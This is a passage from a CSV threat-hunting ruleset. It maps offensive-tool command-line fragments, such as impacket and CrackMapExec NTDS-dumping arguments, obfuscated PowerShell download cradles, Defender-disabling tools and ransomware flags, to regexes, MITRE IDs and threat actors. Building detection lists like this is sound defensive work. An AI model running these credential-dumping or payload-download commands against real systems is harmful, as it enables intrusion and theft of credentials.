SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2354" "* -NoP -w HidDen -c $a=neW-ObJeCt 
nET.wEbClieNt*",".{0,1000}\s\-NoP\s\-w\sHidDen\s\-c\s\$a\=neW\-ObJeCt\snET\.wEbClieNt.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2355" "* -no-pass -dns-tcp -nameserver*",".{0,1000}\s\-no\-pass\s\-dns\-tcp\s\-nameserver.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","2357" "* -no-pass -just-dc-user *",".{0,1000}\s\-no\-pass\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2358" "* -no-pass rid-hijack*",".{0,1000}\s\-no\-pass\srid\-hijack.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","2359" "* -no-pass -usersfile *",".{0,1000}\s\-no\-pass\s\-usersfile\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2360" "* NoPowerShell.*",".{0,1000}\sNoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","2361" "* No-PowerShell.cs*",".{0,1000}\sNo\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","2362" "* --no-ppid-spoof*",".{0,1000}\s\-\-no\-ppid\-spoof.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2363" "* -no-preauth * -dc-ip *",".{0,1000}\s\-no\-preauth\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2364" "* -NoPRo -wIN 1 -nONi -eN Sh33L*",".{0,1000}\s\-NoPRo\s\-wIN\s1\s\-nONi\s\-eN\sSh33L.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","2365" "* -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA *",".{0,1000}\s\-nopROfi\s\-EXe\sbyPAsS\s\-wiNDOwsTy\sHIDdEN\s\-cOMMA\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2366" "* -NopROFi -wIN hidd -EXEcutiOnPoLiC BYpAsS -COm *",".{0,1000}\s\-NopROFi\s\-wIN\shidd\s\-EXEcutiOnPoLiC\sBYpAsS\s\s\-COm\s\s\s\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2367" "* -NoPRofi -WiNdoWSTYL hidd -EXecUTiOnPO BYpASS -cO *",".{0,1000}\s\-NoPRofi\s\-WiNdoWSTYL\shidd\s\-EXecUTiOnPO\sBYpASS\s\-cO\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2368" "* norouteconfig.sh*",".{0,1000}\snorouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","2369" "* --no-sigthief*",".{0,1000}\s\-\-no\-sigthief.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2370" "* -notcontains * -notlike ""ntuser.dat*"" -and $_.Extension -ne "".tm*",".{0,1000}\s\-notcontains\s.{0,1000}\s\-notlike\s\""ntuser\.dat.{0,1000}\""\s\-and\s\$_\.Extension\s\-ne\s\""\.tm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2371" "* --no-vm-kill*",".{0,1000}\s\-\-no\-vm\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","2372" "* --no-vm-snapshot-kill*",".{0,1000}\s\-\-no\-vm\-snapshot\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - 
TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","2373" "* nping-brute.nse*",".{0,1000}\snping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2374" "* nrpe-enum.nse*",".{0,1000}\snrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2375" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","2376" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - 
T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2377" "* NtCr3at3Thr3adEx @ *",".{0,1000}\sNtCr3at3Thr3adEx\s\@\s.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","2378" "* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2379" "* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2380" "* --ntds * -crack 
*",".{0,1000}\s\-\-ntds\s.{0,1000}\s\-crack\s.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","2381" "* -ntds *.dit *-system *",".{0,1000}\s\-ntds\s.{0,1000}\.dit\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2382" "* -ntds NTDS.dit -filters*",".{0,1000}\s\-ntds\sNTDS\.dit\s\s\-filters.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","2383" "* -ntds ntds.dit -system SYSTEM *",".{0,1000}\s\-ntds\sntds\.dit\s\-system\sSYSTEM\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2384" "* -ntds NTDS.dit -system SYSTEM -outputdir /*",".{0,1000}\s\-ntds\sNTDS\.dit\s\-system\sSYSTEM\s\-outputdir\s\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","2385" "* -ntds ntds.dit.save -system system.save LOCAL*",".{0,1000}\s\-ntds\sntds\.dit\.save\s\-system\ssystem\.save\sLOCAL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2386" "* --ntds-file *",".{0,1000}\s\-\-ntds\-file\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","2387" "* --ntds-history*",".{0,1000}\s\-\-ntds\-history.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2388" "* --ntds-pwdLastSet*",".{0,1000}\s\-\-ntds\-pwdLastSet.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2389" "* ntdsuseraccount.py*",".{0,1000}\sntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2390" "* -nthash * 
-domain-sid *",".{0,1000}\s\-nthash\s.{0,1000}\s\-domain\-sid\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2391" "* -nthash * -spn * -domain-sid * -domain *",".{0,1000}\s\-nthash\s.{0,1000}\s\-spn\s.{0,1000}\s\-domain\-sid\s.{0,1000}\s\-domain\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2392" "* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*",".{0,1000}\s\-nthash\s.{0,1000}\-domain\-sid\sS\-1\-5\-11\-39129514\-1145628974\-103568174\s\-domain.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - 
TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2393" "* ntlm.py*",".{0,1000}\sntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2394" "* ntlm.wordlist *--hex-wordlist*",".{0,1000}\sntlm\.wordlist\s.{0,1000}\-\-hex\-wordlist.{0,1000}","offensive_tool_keyword","hashcat","World's fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","2395" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2396" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2397" "* --ntlm-hash --company * --import-cracked *",".{0,1000}\s\-\-ntlm\-hash\s\-\-company\s.{0,1000}\s\-\-import\-cracked\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2398" "* --ntlm-hash --export-hashes *",".{0,1000}\s\-\-ntlm\-hash\s\-\-export\-hashes\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2399" "* --ntlm-hash --import-ntds *.ntds*",".{0,1000}\s\-\-ntlm\-hash\s\-\-import\-ntds\s.{0,1000}\.ntds.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - 
T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2400" "* --ntlm-proxy-ip * --ntlm-proxy-port *",".{0,1000}\s\-\-ntlm\-proxy\-ip\s.{0,1000}\s\-\-ntlm\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","2401" "* ntlmrecon*",".{0,1000}\sntlmrecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","2402" "* ntlmrelayx.py*",".{0,1000}\sntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
